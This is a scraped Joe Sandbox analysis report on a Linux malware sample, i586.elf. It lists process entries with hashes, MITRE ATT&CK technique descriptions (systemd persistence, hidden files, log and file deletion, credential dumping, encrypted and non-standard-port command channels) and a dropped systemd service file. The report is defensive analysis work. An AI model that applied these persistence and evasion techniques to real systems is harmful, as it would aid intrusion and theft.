Start date (UTC):	02/01/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6435, Parent PID: 1320

General

Start time (UTC):	07:51:51
Start date (UTC):	02/01/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gdm3 PID: 6438, Parent PID: 1320

General

Start time (UTC):	07:51:51
Start date (UTC):	02/01/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6438, Parent PID: 1320

General

Start time (UTC):	07:51:51
Start date (UTC):	02/01/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report i586.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/startup_command.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: i586.elf PID: 6263, Parent PID: 6188

General

Chronological Activities

Analysis Process: i586.elf PID: 6264, Parent PID: 6263

General

Chronological Activities

Analysis Process: i586.elf PID: 6265, Parent PID: 6264

General

Chronological Activities

Analysis Process: i586.elf PID: 6441, Parent PID: 6265

General

Analysis Process: i586.elf PID: 6442, Parent PID: 6265

General

Analysis Process: i586.elf PID: 6443, Parent PID: 6265

General

Linux Analysis Report
i586.elf